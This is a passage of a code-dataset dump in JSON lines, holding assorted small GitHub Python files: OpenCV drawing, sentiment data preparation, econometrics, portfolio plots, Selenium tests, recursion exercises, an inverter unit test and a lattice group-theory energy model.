64), 64, (0,255,0), 2)\nimg = cv2.circle(img, (255,55), 50, (255,255,255), )\n#text\n#image-data, text, start-pt, font-face, font-size, color, thickness, line-type\nfont = cv2.FONT_HERSHEY_SIMPLEX\nimg = cv2.putText(img, 'OpenCV', (10,500), font, 4, (255,255,255), 10, cv2.LINE_AA)\n\ncv2.imshow('image', img)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"bmanandhar/OpenCVExamples","sub_path":"05_geometric_shapes.py","file_name":"05_geometric_shapes.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74432857546","text":"import numpy\nimport textblob\nimport os\nimport re\n\npos = []\nneg = []\nfor filename in os.listdir('txt_sentoken/pos'):\n fp = open('txt_sentoken/pos/'+filename, 'r')\n doc = fp.read()\n doc = re.sub(r\"\\n\", \" \", doc) + '\\n'\n pos.append(doc)\n fp.close()\nprint('finish reading pos data')\nfor filename in os.listdir('txt_sentoken/neg'):\n fp = open('txt_sentoken/neg/'+filename, 'r')\n doc = fp.read()\n doc = re.sub(r\"\\n\", \" \", doc) + '\\n'\n neg.append(doc)\n fp.close()\nprint('finish reading neg data')\nfp_pos = open('pos.txt', 'w')\nfor doc in pos:\n fp_pos.write(doc)\nfp_pos.close()\nprint('finish writing pos data')\nfp_neg = open('neg.txt','w')\nfor doc in neg:\n fp_neg.write(doc)\nfp_neg.close()\nprint('finish writing neg data')\nprint('done')\n","repo_name":"luojiahai/cluster-cloud-backend","sub_path":"main/node/get_training_set.py","file_name":"get_training_set.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71919167625","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n'''\n@Project :Awesome-Uplift-Model \n@File :example_2.py\n@Author :JackHCC\n@Date :2022/12/3 17:49 \n@Desc :\n\n'''\nimport linearmodels as lm\nfrom causaldata import organ_donations\n\nod = organ_donations.load_pandas().data\n\n# Keep only pre-treatment data\nod = od.loc[od['Quarter_Num'] <= 3]\n\n# Create fake treatment variables\nod['California'] = od['State'] == 'California'\nod['FakeAfter1'] = od['Quarter_Num'] > 1\nod['FakeAfter2'] = od['Quarter_Num'] > 2\nod['FakeTreat1'] = 1 * (od['California'] & od['FakeAfter1'])\nod['FakeTreat2'] = 1 * (od['California'] & od['FakeAfter2'])\n\n# Set our individual and time (index) for our data\nod = od.set_index(['State', 'Quarter_Num'])\n\n# Run the same model as before\n# but with our fake treatment variables\nmod1 = lm.PanelOLS.from_formula('''Rate ~ 
\nFakeTreat1 + EntityEffects + TimeEffects''', od)\nmod2 = lm.PanelOLS.from_formula('''Rate ~ \nFakeTreat2 + EntityEffects + TimeEffects''', od)\n\nclfe1 = mod1.fit(cov_type='clustered',\n cluster_entity=True)\nclfe2 = mod1.fit(cov_type='clustered',\n cluster_entity=True)\n\nprint(clfe1)\nprint(clfe2)\n","repo_name":"JackHCC/Awesome-Uplift-Model","sub_path":"Example/The_Effect/Difference-in-Differences/example_2.py","file_name":"example_2.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"81"} +{"seq_id":"72474647305","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 29 16:03:23 2022\r\n\r\n@author: evely\r\n\"\"\"\r\n\r\n#Evelyn Baranski\r\n#3/29/22\r\n#Efficient Portfolios\r\n\r\n\r\n#This file is plotting stock prices, cumulative change, and efficient frontier\r\n\r\n\r\n#Importing required packages\r\nimport numpy as np\r\nimport datetime as dt\r\nimport matplotlib.pyplot as plt\r\n\r\n#importing from previous task\r\nfrom efficient_port import *\r\n\r\n\r\n#Plotting prices\r\ndef plot_stock_prices(symbols):\r\n \"\"\"This function creates a graph of historical stock\r\n prices for however many stocks given in string \r\n 'symbols'.\"\"\"\r\n \r\n #getting df for the stock prices\r\n prices_df = get_stock_prices_from_csv_files(symbols)\r\n \r\n #Gettng x value - Date\r\n x = prices_df.index\r\n \r\n \r\n #iterating through columns in df, plotting with x\r\n for col in prices_df.columns:\r\n \r\n y = prices_df[col]\r\n plt.plot(x, y)\r\n \r\n \r\n #altering titles & labels on graph\r\n plt.xlabel('Date')\r\n plt.ylabel('Price')\r\n plt.title('Stock Prices')\r\n \r\n #adjusting the tiks for x axis\r\n plt.xticks(x[::2], rotation = 45)\r\n plt.locator_params(axis='x', nbins=len(x)/15)\r\n\r\n plt.show()\r\n\r\n\r\n#Plotting cumulative change\r\ndef plot_stock_cumulative_change(symbols):\r\n \"\"\"This function plots a graph of cumulative stock returns for\r\n stocks within the list, symbols. 
Monthly cumulative stock returns.\"\"\"\r\n \r\n stock_df = get_stock_prices_from_csv_files(symbols)\r\n\r\n #getting cumulative changes in price\r\n cum_change = ((stock_df.iloc[0:] - stock_df.iloc[0]) / stock_df.iloc[0]) + 1\r\n \r\n \r\n #plotting:\r\n #setting x variable\r\n x = stock_df.index\r\n \r\n #iterating through columns in df, plotting with x\r\n for col in cum_change.columns:\r\n \r\n y = cum_change[col]\r\n plt.plot(x, y)\r\n \r\n \r\n #altering titles & labels on graph\r\n plt.xlabel('Date')\r\n plt.ylabel('Relative Price')\r\n plt.title('Cumulative Change in Stock Price')\r\n \r\n #adjusting the tiks for x axis\r\n plt.xticks(x[::2], rotation = 45)\r\n plt.locator_params(axis='x', nbins=len(x)/15)\r\n\r\n plt.show()\r\n\r\n\r\n\r\n\r\n#Plotting efficient frontier\r\ndef plot_efficient_frontier(symbols):\r\n \"\"\"This function creates a graph of the efficient frontier\r\n (set of min var portfolios) that can be aacheived using\r\n small set of assets.\"\"\"\r\n \r\n #getting values to calculate range of rate of return\r\n returns = get_stock_returns_from_csv_files(symbols)\r\n cov = get_covariance_matrix(returns)\r\n\r\n e = np.matrix(returns.mean())\r\n v = np.matrix(cov)\r\n w = calc_global_min_variance_portfolio(v)\r\n ret = calc_portfolio_return(e, w)\r\n\r\n #creating min and max values for rs\r\n min_rs = ret - (ret * 5)\r\n max_rs = ret + (ret * 5)\r\n \r\n \r\n #rates of returns (rs) array\r\n rs = np.linspace(min_rs, max_rs)\r\n \r\n #standard deviation array\r\n stdev_array = calc_efficient_portfolios_stdev(e, v, rs)\r\n \r\n\r\n #Plotting stdev vs. list of rates\r\n plt.plot(stdev_array, rs)\r\n \r\n #adding chart titles, etc.\r\n plt.xlabel('Portfolio Standard Deviation')\r\n plt.ylabel('Portfolio Expected Return')\r\n plt.title('Efficient Frontier')\r\n \r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n symbols = ['AAPL', 'DIS', 'GOOG', 'KO', 'WMT']\r\n \r\n #plot_stock_prices(symbols)\r\n \r\n plot_stock_cumulative_change(symbols)\r\n \r\n #plot_efficient_frontier(symbols)\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"evelyngbaranski/Efficient_Portfolios","sub_path":"plotting_efficient_port.py","file_name":"plotting_efficient_port.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16215028965","text":"import core.src.action_frames as frames\nimport core.src.ret_code as ret_code\nimport ext.src.common_checking as checking\nfrom ext.src.hint_common import fix_target_action, target_filter, range_filter\n\ndef steal_action(gc, args):\n cards = gc.cards_by_ids(args['use'])\n checking.only_one_card_named_as(cards, 'steal')\n return steal_check(gc, args)\n\ndef steal_check(gc, args):\n targets_ids = args['targets']\n user = gc.player_by_token(args['token'])\n cards = gc.cards_by_ids(args['use'])\n checking.only_one_target(targets_ids)\n target = gc.player_by_id(targets_ids[0])\n checking.valid_target(user, target, 'steal')\n checking.forbid_target_self(user, target)\n checking.forbid_target_no_card(target, gc)\n checking.within_range(gc, user, target, 'steal')\n\n gc.use_cards_for_players(user, targets_ids, args['action'], cards)\n hint = { 'regions': target.all_regions(gc) }\n gc.push_frame(\n frames.AcceptMessage(gc, [user], 'region', hint,\n lambda a: on_region(gc, user, target, a)))\n return { 'code': ret_code.OK }\n\ndef steal_target(gc, user):\n players = filter(lambda p: gc.player_has_cards(p), gc.succeeding_players())\n players = range_filter(gc, user, 
'steal', players)\n return fix_target_action(target_filter('steal', user, players))\n\ndef on_region(gc, user, target, args):\n region = args['region']\n if region == 'onhand':\n cards = gc.random_pick_cards(target, 1)\n if len(cards) == 0:\n raise ValueError('bad region')\n gc.private_cards_transfer(target, user, cards)\n else:\n gc.public_cards_transfer(target, user,\n [target.unequip_check(gc, region)])\n","repo_name":"zheplusplus/sgs","sub_path":"ext/src/sleevecards/steal.py","file_name":"steal.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"7871463953","text":"import pymysql\n\nconnection= pymysql.connect(host='localhost', user='root', db='bot')\n\na = connection.cursor()\n\nquery = 'select * from place'\n\na.execute(query)\n\n\nmainList = []\ndata = a.fetchall()\n\n\nfor row in data:\n currList = []\n\n col = 0\n for rowEntry in row:\n if col > 1:\n currList.append(rowEntry)\n\n col += 1\n mainList.append(currList)\n\nprint(mainList)\n\n\n\n\n\n","repo_name":"mercury9181/chat_bot","sub_path":"mysql_prac.py","file_name":"mysql_prac.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"31638135988","text":"# -*- coding: utf-8 -*-\nimport requests\nimport json\nimport xlrd, xlwt\nimport mf\nimport sys\n\n#用于测试高德api是否能正确读取到想要的值\n\n# print(sys.path[0])\n# 可更改参数#####################################\nexcel_name = '地址名称数据_襄阳南路500m.xls'\n# 打开excel表格读取数据于data中\ndata = xlrd.open_workbook(sys.path[0] + '/襄阳南路/半径_襄阳南路500m.xls')\n################################################\n# 选中第一个sheet\ntable = data.sheets()[0]\n#创建写数据的excel\nbook = xlwt.Workbook(encoding='utf-8')\nsheet = book.add_sheet('Sheet1')\nsheet.write(0, 0, '序号')\nsheet.write(0, 1, '地址名称')\nsheet.write(0, 2, '最短距离')\nsheet.write(0, 3, '感兴趣点数')\nsheet.write(0, 4, '距离')\n\n\n# 读取经纬度\nfor i in range(table.nrows):\n if i == 0:\n continue\n xuhao = table.cell(i, 0).value# 获取坐标表格中的序号\n distance = table.cell(i, 3).value# 获取坐标表格中的距离信息\n print('行:', i, '序号:', xuhao)# 打印序号\n jingdu = round(table.cell(i, 1).value, 6)# 获取表格中的经度\n weidu = round(table.cell(i, 2).value, 6) # 获取表格中的纬度\n url = 'http://restapi.amap.com/v3/geocode/regeo?output=json&location='+str(jingdu)+','+str(weidu)+\\\n '&key=389880a06e3f893ea46036f030c94700&radius=100&extensions=all'\n res = requests.get(url)\n params = json.loads(res.text)\n # 100米内无感兴趣点即跳过\n if len(params[\"regeocode\"][\"pois\"]) == 0:\n sheet.write(i, 0, xuhao)\n sheet.write(i, 1, '无')\n print('无无无无')\n continue\n # 比较各感兴趣点与坐标点的距离,选择最近的那个\n d_poi = {}\n for poi in params[\"regeocode\"][\"pois\"]:\n # print(poi['name'], poi['distance'])\n d_poi[poi['name']] = float(poi['distance'])# 加入字典\n min_distance = min(d_poi.values())\n name = mf.get_keys(d_poi, min_distance)\n print(name[0], min_distance)\n sheet.write(i, 0, xuhao)\n sheet.write(i, 1, name[0])\n sheet.write(i, 2, min_distance)\n sheet.write(i, 3, len(params[\"regeocode\"][\"pois\"]))\n sheet.write(i, 4, distance)\n book.save('D:/软件学习_Software/python/高德API_找半径/虹古路/'+excel_name)\n # if i == 10:\n # break\n\nprint('finish')\n\n\n","repo_name":"crazybanboo/gaodeMap","sub_path":"mapSearch.py","file_name":"mapSearch.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29390654261","text":"s = \"kibria\"\nl = len(s)\nc = 0\nfor i in range(l): \n if(s[i] 
!= s[l-i-1]): \n c = 1\n break\n\nif c == 0: \n print(\"yes\")\nelse: \n print(\"Not palindrome\")","repo_name":"himelhrh/Python","sub_path":"Exercise/31. Palindrome.py","file_name":"31. Palindrome.py","file_ext":"py","file_size_in_byte":169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73249739785","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\nclass TestAbs(unittest.TestCase):\n variables = [\n {\n 'selector': \".first_class > input\",\n 'value': \"Ivan\",\n 'By': By.CSS_SELECTOR\n },\n {\n 'selector': \"[placeholder='Input your last name']\",\n 'value': \"Petrov\",\n 'By': By.CSS_SELECTOR\n },\n {\n 'selector': \"//input[contains(@placeholder,'email')]\",\n 'value': \"Email\",\n 'By': By.XPATH\n },\n {\n 'selector': \"//button[@type='submit']\",\n 'value': None,\n 'By': By.XPATH\n },\n {\n 'selector': \"h1\",\n 'value': None,\n 'By': By.TAG_NAME\n }\n ]\n time_remaining = 2\n\n def body_of_tests(self, link):\n try:\n browser = webdriver.Chrome()\n for i in range(len(self.variables) - 2):\n browser.find_element(\n self.variables[i]['By'], self.variables[i]['selector']).send_keys(\n self.variables[i]['value']\n )\n\n browser.find_element(\n self.variables[3]['By'], self.variables[3]['selector']).click()\n\n welcome_text = WebDriverWait(browser, self.time_remaining).until(\n EC.element_to_be_clickable((\n self.variables[4]['By'], self.variables[4]['selector']))\n ).text\n\n self.assertEqual(\n \"Congratulations! You have successfully registered!\", welcome_text,\n \"Text is not Equal\")\n finally:\n browser.quit()\n\n def test_first_link(self):\n self.body_of_tests('http://suninjuly.github.io/registration1.html')\n\n def test_second_link(self):\n self.body_of_tests('http://suninjuly.github.io/registration2.html')\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Dorivan/stepik_auto_tests_course","sub_path":"stepik_py/lesson_3/3.2/test_3_2_13.py","file_name":"test_3_2_13.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7576779921","text":"'''\nexcel_funcs.py (Excel Command Line Tool)\nSydney Fowler and Matthew Hileman\n15 December 2019\nDescription: Common excel related methods used throughout several tools.\n Includes: get_directory, save_file, get_sheet\n'''\n\n# ================ IMPORTS ================\n# System\nimport os\n\n# Custom\nimport menus\n\n# ================ METHODS ================\n# Get file function, used in various tools\ndef get_directory(type_array, message):\n\n print()\n print(\" Input a file \".center(70, \"=\"))\n print('-' * 70)\n\n # Initialize error flag\n error_found = 0\n while True:\n\n # Import path input\n file_path = input(message)\n\n # Check that file exists\n if os.path.exists(file_path):\n for type in type_array:\n\n # Checks for correct file type\n if file_path[-len(type):] != type:\n error_found = 1\n else:\n error_found = 0\n\n # If incorrect file type, print error, loop.\n if error_found:\n print(\"ERROR: Invalid file TYPE. 
Must be \" + str(type_array))\n print()\n continue\n else:\n print('-' * 40)\n print()\n break\n\n # If incorrect path or file does not exist, print error, loop.\n else:\n print(\"ERROR: Invalid file PATH.\")\n print()\n continue\n\n # Happy path, returns file and file path. Will return path if no file.\n return file_path\n\n\n# Saves copy of a wb\ndef save_file(wb, wb_path, type):\n\n print()\n print(\" Enter a name for new save file \".center(70, \"=\"))\n print('-' * 70)\n\n # Removes original file name\n save_path = os.path.dirname(os.path.abspath(wb_path))\n\n # Gets name for new file\n save_path += \"/\" + input(\"Input new file's name (saves to same directory): \") + type\n\n # Save to a new copy of the workbook\n wb.save(save_path)\n print(\"Done! New file saved to \" + save_path)\n input(\"Press enter to continue...\")\n\n\n# Has user select sheet to perform actions on\ndef get_sheet(wb):\n\n # Creates menu\n sheets = wb.sheetnames # Edited depreciated function: \"wb.get_sheet_names()\"\n sheet_menu = menus.Value_Menu(\"duplicate_removal\", sheets, sheets)\n print()\n print(\" Choose a sheet to remove duplicates \".center(70, \"=\"))\n print('-' * 70)\n\n # User selects sheet to use, returns that sheet\n sheet = wb.get_sheet_by_name(sheet_menu.display_shift_menu())\n return sheet\n","repo_name":"sydneyfowler/CS3030","sub_path":"excel_funcs.py","file_name":"excel_funcs.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70673382985","text":"# 2.Write a program to find nth fibonacci number with recursion?\n# A Fibonacci series is a series in which next number is a sum of previous two numbers.\n#\n# For example : 0, 1, 1, 2, 3, 5, 8\n# First Fibonacci number is 0, second is 1, third is 2 and etc.\n# Input: fib(2)\n# Output: 1\n# After implemetation of this task: Write a Python program to check if a given number is a Fibonacci number or not.\n# Input: 8\n# Output: True\n\n\ndef fibonacci(n):\n print(n)\n if n <= 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)\n\n\ndef list_sum(num_List):\n if len(num_List) == 1:\n return num_List[0]\n else:\n return num_List[0] + list_sum(num_List[1:])\n\n\ndef factorial(n):\n if n == 0:\n return 1\n else:\n return n * factorial(n - 1)\n\n\ndef fib(n):\n if n <= 1:\n return n\n else:\n return fib(n - 1) + fib(n - 2)\n\n\ndef power(base, exp):\n if exp == 0:\n return 1\n if exp == 1:\n return base\n else:\n return base * (power(base, exp - 1))\n\n# Кулите на Ханой!\ndef toh(n, start, end, aux):\n if (n == 1):\n print(\"Move disk 1 from\", start, \"to\", end)\n return\n toh(n - 1, start, aux, end)\n print(\"Move disk\", n, \"from\", start, \"to\", end)\n toh(n - 1, aux, end, start)\n\n\nif __name__ == \"__main__\":\n # n = 5\n # result = fibonacci(n)\n # print(result)\n #\n # print(list_sum([2, 4, 5, 6, 7]))\n #\n # print(factorial(5))\n toh(5, \"I\", \"II\", \"III\")\n","repo_name":"reniboyanova/python_most_common_interview_tasks","sub_path":"recursion_tasks.py","file_name":"recursion_tasks.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21530808000","text":"from unittest.mock import Mock\n\nimport pytest\nimport requests_mock\n\nfrom helpermodules import compatibility\nfrom modules.common.store._api import LoggingValueStore\nfrom modules.devices.fronius import inverter\nfrom 
modules.devices.fronius.config import FroniusConfiguration, FroniusInverterSetup\nfrom test_utils.mock_ramdisk import MockRamdisk\n\nSAMPLE_IP = \"1.1.1.1\"\n\n\n@pytest.fixture\ndef mock_ramdisk(monkeypatch):\n monkeypatch.setattr(compatibility, \"is_ramdisk_in_use\", lambda: True)\n return MockRamdisk(monkeypatch)\n\n\ndef test_update(monkeypatch, requests_mock: requests_mock.Mocker, mock_ramdisk, mock_simcount):\n wr = inverter.FroniusInverter(0, FroniusInverterSetup(), FroniusConfiguration(ip_address=SAMPLE_IP))\n\n mock = Mock(return_value=None)\n monkeypatch.setattr(LoggingValueStore, \"set\", mock)\n mock_simcount.return_value = 0, 0\n requests_mock.get(\n \"http://\" + SAMPLE_IP + \"/solar_api/v1/GetPowerFlowRealtimeData.fcgi\",\n json=json_wr1)\n\n wr.update()\n\n # mock.assert_called_once()\n inverter_state = mock.call_args[0][0]\n assert inverter_state.exported == 0\n assert inverter_state.currents == [0, 0, 0]\n assert inverter_state.power == -196.08712768554688\n\n\njson_wr1 = {\n \"Body\": {\n \"Data\": {\n \"Inverters\": {\n \"1\": {\n \"Battery_Mode\": \"normal\",\n \"DT\": 1,\n \"E_Day\": None,\n \"E_Total\": 9824871.8336111102,\n \"E_Year\": None,\n \"P\": 1263.8095703125,\n \"SOC\": 41.100000000000001\n }\n },\n \"Site\": {\n \"BackupMode\": \"false\",\n \"BatteryStandby\": \"true\",\n \"E_Day\": None,\n \"E_Total\": 9824871.8336111102,\n \"E_Year\": None,\n \"Meter_Location\": \"grid\",\n \"Mode\": \"bidirectional\",\n \"P_Akku\": 1126.365966796875,\n \"P_Grid\": -107.8,\n \"P_Load\": -1143.5296386718751,\n \"P_PV\": 196.08712768554688,\n \"rel_Autonomy\": 100.0,\n \"rel_SelfConsumption\": 91.385163695601761\n },\n \"Smartloads\": {\n \"Ohmpilots\": {}\n },\n \"Version\": \"12\"\n }\n },\n \"Head\": {\n \"RequestArguments\": {},\n \"Status\": {\n \"Code\": 0,\n \"Reason\": \"\",\n \"UserMessage\": \"\"\n },\n \"Timestamp\": \"2022-01-04T09:45:59+00:00\"\n }\n}\n\njson_wr2 = {\n \"Body\": {\n \"Data\": {\n \"Inverters\": {\n \"1\": {\n \"DT\": 232,\n \"E_Day\": 172.69999694824219,\n \"E_Total\": 3372.76953125,\n \"E_Year\": 10754989,\n \"P\": 108\n }\n },\n \"Site\": {\n \"E_Day\": 172.69999694824219,\n \"E_Total\": 3372.7694444444446,\n \"E_Year\": 10754989,\n \"Meter_Location\": \"unknown\",\n \"Mode\": \"produce-only\",\n \"P_Akku\": None,\n \"P_Grid\": None,\n \"P_Load\": None,\n \"P_PV\": 108,\n \"rel_Autonomy\": None,\n \"rel_SelfConsumption\": None\n },\n \"Version\": \"12\"\n }\n },\n \"Head\": {\n \"RequestArguments\": {},\n \"Status\": {\n \"Code\": 0,\n \"Reason\": \"\",\n \"UserMessage\": \"\"\n },\n \"Timestamp\": \"2021-12-30T10:37:02+01:00\"\n }\n}\n","repo_name":"snaptec/openWB","sub_path":"packages/modules/devices/fronius/inverter_test.py","file_name":"inverter_test.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","stars":322,"dataset":"github-code","pt":"81"} +{"seq_id":"17075110737","text":"import queue\nfrom enum import Enum\nfrom GoalTester import GoalTester\nfrom PathValidator import PathValidator\nfrom MapCreator import MapCreator\nclass PipeFinder(object):\n def FindPipe(self):\n actions = queue.Queue() # Actions Queue\n actions.put(\"\") # Initializing empty queue\n path = \"\" # First path in map\n mario_map = MapCreator().CreateMarioMap3() # Creating the map\n moves = [\"L\", \"R\", \"U\", \"D\"]\n while not GoalTester().findEnd(mario_map, path): # == False:\n path = actions.get() # Set of moves Ex. 
LLURU\n for move in moves:\n posible_path = path + move\n if PathValidator().Valid(mario_map, posible_path): # Validates if a path is posible\n actions.put(posible_path)","repo_name":"ASDIO1/mario-map-diego-sanchez","sub_path":"PipeFinder.py","file_name":"PipeFinder.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15427447999","text":"import math\nimport itertools\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.distributions as dist\nimport torch_scatter\n\ndevice = torch.device('cpu') # default\n\n\"\"\" -------- Infrastructures -------- \"\"\"\n\nclass Lattice(object):\n \"\"\" Hosts lattice information and construct causal graph\n \n Args:\n size: number of size along one dimension (assuming square/cubical lattice)\n dimension: dimension of the lattice\n \"\"\"\n def __init__(self, size:int, dimension:int):\n self.size = size\n self.dimension = dimension\n self.shape = [size]*dimension\n self.sites = size**dimension\n self.tree_depth = self.sites.bit_length()\n self.node_init()\n \n def __repr__(self):\n return 'Lattice({} grid with tree depth {})'.format(\n 'x'.join(str(L) for L in self.shape),\n self.tree_depth)\n \n def node_init(self):\n \"\"\" Node initialization, calculate basic node information\n for other methods in this class to work.\n Called by class initialization. \"\"\"\n self.node_index = torch.zeros(self.sites, dtype=torch.long)\n def partition(rng: torch.Tensor, dim: int, ind: int, lev: int):\n if rng[dim].sum()%2 == 0:\n mid = rng[dim].sum()//2\n rng1 = rng.clone()\n rng1[dim, 1] = mid\n rng2 = rng.clone()\n rng2[dim, 0] = mid\n partition(rng1, (dim + 1)%self.dimension, 2*ind, lev+1)\n partition(rng2, (dim + 1)%self.dimension, 2*ind + 1, lev+1)\n else:\n self.node_index[ind-self.sites] = rng[:,0].dot(self.size**torch.arange(0,self.dimension).flip(0))\n partition(torch.tensor([[0, self.size]]*self.dimension), 0, 1, 1)\n \n def causal_graph(self, k = 3):\n \"\"\" Construct causal graph \n Args: k - number of generations to consider\n \"\"\"\n self.family = {} # a dict hosting all relatives\n def child(i, k): # kth-generation child of node i\n return set(2**k * i + q for q in range(2**k))\n def relative(k0, k1): # (k0, k1)-relatives\n # two nodes i0 and i1 are (k0, k1)-relative,\n # if their closest common ancestor is k0 and k1 generations from them respectively\n if (k0, k1) not in self.family: # if relation not found\n rels = set() # start collecting relative relations\n for i in range(1, self.sites//2**max(k0, k1)): # for every possible common ancestor\n ch0 = child(i, k0) # set of k0-child\n ch1 = child(i, k1) # set of k1-child\n rels |= set((i0, i1) for i0 in ch0 for i1 in ch1 if i0 <= i1)\n for k in range(min(k0, k1)): # exlusing closer relatives\n rels -= relative(k0 - k - 1, k1 - k - 1)\n self.family[(k0, k1)] = rels # record the relations\n return self.family[(k0, k1)]\n # collect all relatives within k generations\n typ = 0\n gen = {}\n for k1 in range(0, k):\n for k0 in range(0, k1 + 1):\n gen[typ] = relative(k0, k1)\n typ += 1\n index_list = [torch.tensor(sorted(list(gen[typ]))).t() for typ in gen]\n type_list = [torch.Tensor().new_full((1, len(gen[typ])), typ, dtype=torch.long) for typ in gen]\n graph = torch.cat([torch.cat(index_list, -1), torch.cat(type_list, -1)], 0)\n return graph.to(device)\n\nclass Group(object):\n \"\"\"Represent a group, providing multiplication and inverse operation.\n \n Args:\n mul_table: 
multiplication table as a tensor, e.g. Z2 group: tensor([[0,1],[1,0]])\n \"\"\"\n def __init__(self, mul_table: torch.Tensor):\n super(Group, self).__init__()\n self.mul_table = mul_table.to(device)\n self.order = mul_table.size(0) # number of group elements\n gs, ginvs = torch.nonzero(self.mul_table == 0, as_tuple=True)\n self.inv_table = torch.gather(ginvs, 0, gs).to(device)\n self.val_table = None\n \n def __iter__(self):\n return iter(range(self.order))\n \n def __repr__(self):\n return 'Group({} elements)'.format(self.order)\n \n def inv(self, input: torch.Tensor):\n return torch.gather(self.inv_table.expand(input.size()[:-1]+(-1,)), -1, input)\n \n def mul(self, input1: torch.Tensor, input2: torch.Tensor):\n output = input1 * self.order + input2\n return torch.gather(self.mul_table.flatten().expand(output.size()[:-1]+(-1,)), -1, output)\n \n def prod(self, input, dim: int, keepdim: bool = False):\n input_size = input.size()\n flat_mul_table = self.mul_table.flatten().expand(input_size[:dim]+input_size[dim+1:-1]+(-1,))\n output = input.select(dim, 0)\n for i in range(1, input.size(dim)):\n output = output * self.order + input.select(dim, i)\n output = torch.gather(flat_mul_table, -1, output)\n if keepdim:\n output = output.unsqueeze(dim)\n return output\n \n def val(self, input, val_table = None):\n if val_table is None:\n val_table = self.default_val_table()\n elif len(val_table) != self.order:\n raise ValueError('Group function value table must be of the same size as the group order, expect {} got {}.'.format(self.order, len(val_table)))\n return torch.gather(val_table.expand(input.size()[:-1]+(-1,)), -1, input)\n\n def default_val_table(self):\n if self.val_table is None:\n val_table = torch.zeros(self.order)\n val_table[0] = 1.\n self.val_table = val_table.to(device)\n return self.val_table\n\nclass SymmetricGroup(Group):\n \"\"\" Represent a permutation group \"\"\"\n def __init__(self, n: int):\n self.elements = list(itertools.permutations(range(n), n))\n index = {g:i for i, g in enumerate(self.elements)}\n mul_table = torch.empty([len(self.elements)]*2, dtype=torch.long)\n for g1 in self.elements:\n for g2 in self.elements:\n g = tuple(g1[a] for a in g2)\n mul_table[index[g1], index[g2]] = index[g]\n super(SymmetricGroup, self).__init__(mul_table)\n\n def default_val_table(self):\n if self.val_table is None:\n def cycle_number(g):\n if len(g) == 0:\n return 0\n elif g[0] == 0:\n return cycle_number(tuple(a - 1 for a in g[1:])) + 1\n else:\n return cycle_number(tuple(g[0] - 1 if a == 0 else a - 1 for a in g[1:]))\n val_table = torch.tensor([cycle_number(g) for g in self.elements], dtype=torch.float)\n self.val_table = val_table.to(device)\n return self.val_table\n\n\n\"\"\" -------- Energy Model -------- \"\"\"\n\nclass EnergyTerm(nn.Module):\n \"\"\" represent an energy term\"\"\"\n strength = 1.\n group = None\n lattice = None\n def __init__(self):\n super(EnergyTerm, self).__init__()\n \n def __mul__(self, other):\n self.strength *= other\n return self\n \n def __rmul__(self, other):\n return self * other\n \n def __neg__(self):\n return self * (-1)\n \n def __add__(self, other):\n if isinstance(other, EnergyTerm):\n return EnergyTerms([self, other])\n elif isinstance(other, EnergyTerms):\n return other.append(self)\n \n def __radd__(self, other):\n return self + other\n \n def __sub__(self, other):\n return self + (- other)\n \n def __rsub__(self, other):\n return (- self) + other\n \n def extra_repr(self):\n return '{}'.format(self.strength)\n \n def on(self, group: Group = 
None, lattice: Lattice = None):\n self.group = group\n self.lattice = lattice\n return self\n \n def forward(self):\n if self.group is None:\n raise RuntimeError('A group structure has not been linked before forward evaluation of the energy term. Call self.on(group = group) to link a Group.')\n if self.lattice is None:\n raise RuntimeError('A lattice system has not been linked before forward evaluation of the energy term. Call self.on(lattice = lattice) to link a Lattice.')\n\nclass EnergyTerms(nn.ModuleList):\n \"\"\" represent a sum of energy terms\"\"\"\n def __init__(self, *arg):\n super(EnergyTerms, self).__init__(*arg)\n \n def __mul__(self, other):\n for term in self:\n term = term * other\n return self\n \n def __rmul__(self, other):\n return self * other\n \n def __neg__(self):\n return self * (-1)\n \n def on(self, group: Group = None, lattice: Lattice = None):\n for term in self:\n term.on(group, lattice)\n return self\n \n def forward(self, input):\n return sum(term(input) for term in self)\n\nclass OnSite(EnergyTerm):\n \"\"\" on-site energy term \"\"\"\n def __init__(self, val_table = None):\n super(OnSite, self).__init__()\n self.val_table = val_table.to(device)\n \n def extra_repr(self):\n if not self.val_table is None:\n return 'G -> {}'.format((self.val_table * self.strength).tolist())\n 